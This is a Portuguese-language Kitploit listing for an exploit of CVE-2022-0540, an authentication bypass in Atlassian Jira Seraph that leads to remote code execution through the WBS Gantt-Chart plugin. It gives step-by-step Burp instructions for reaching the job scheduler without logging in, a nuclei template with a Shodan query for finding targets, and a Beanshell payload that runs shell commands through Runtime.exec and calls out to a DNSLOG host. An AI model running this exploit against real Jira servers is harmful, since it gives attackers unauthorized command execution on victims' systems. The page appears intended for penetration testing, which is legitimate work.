Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-0540-RCE — Atlassian Jira Seraph Authentication Bypass RCE(CVE-2022-0540) | Kitploit
Ferramentas/GitHubGitHub/pear1y/cve-2022-0540-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoDesenvolvimento de Payloads
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Atlassian Jira Seraph Authentication Bypass RCE(CVE-2022-0540)

Ver Repositório
71133há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RCE de Bypass de Autenticação no Atlassian Jira Seraph(CVE-2022-0540)

Inglês • 中文

Detalhes do Exploit

Conforme visto no blog do autor, a Atlassian forneceu uma longa lista de plugins afetados (a grande maioria dos quais eram falsos positivos), e o autor listou vários plugins realmente afetados

image-20220525190523282

De acordo com as condições apresentadas, em combinação com a documentação oficial do WBS Gantt-Chart for Jira

image-20220525190607569

Essencialmente, é um RCE que utiliza o Beanshell Script do módulo Task do agendador de tarefas; os detalhes do exploit são os seguintes.

  1. Para operação manual, é melhor usar a função de substituição do BurpSuite Proxy > Options > Match and Replace, edite a regra.

image-20220525190640472

  1. Use o burp como proxy para acessar o software Jira vulnerável, abra http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa; e então você pode verificar job scheduler configuration

image-20220525190657966

Como nosso Beanshell Script final é executado como uma tarefa agendada, você pode modificar o intervalo de execução para sua conveniência clicando em Edit e alterando-o de acordo com o formato Cron.

  1. criar a Task

image-20220525190713512

  1. configurar a Task

image-20220525190728145

Após a conclusão da configuração, clique em Update, porém será levado à página de login; não se preocupe, a Task foi de fato adicionada em segundo plano.

  1. Habilitar a Task

image-20220525190740547

A Task recém-criada fica como Disable por padrão; você precisa alterá-la manualmente para Enable e então aguardar alguns segundos para o Script ser executado.

  1. Registro do DNSLOG

image-20220525190756503

ao mesmo tempo, você pode ver o aviso de conclusão da execução no agendador de tarefas.

image-20220525190830668


Pré-requisitos

root@kitploit:~
WBS Gantt-Chart for Jira <= 9.14.3.1

Verificar se é Explorável

root@kitploit:~
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

Demo de Execução

root@kitploit:~
nuclei -l targets.txt -t exploit.yaml

Captura de tela

image-20220525173951955

Referências

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Beanshell Script

root@kitploit:~
import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

As informações mencionadas neste artigo destinam-se exclusivamente a testes de penetração legítimos e autorizados, verificações internas de segurança corporativa e fins de pesquisa. O usuário é responsável por quaisquer consequências adversas decorrentes do uso das informações fornecidas neste artigo.

Baixar ferramenta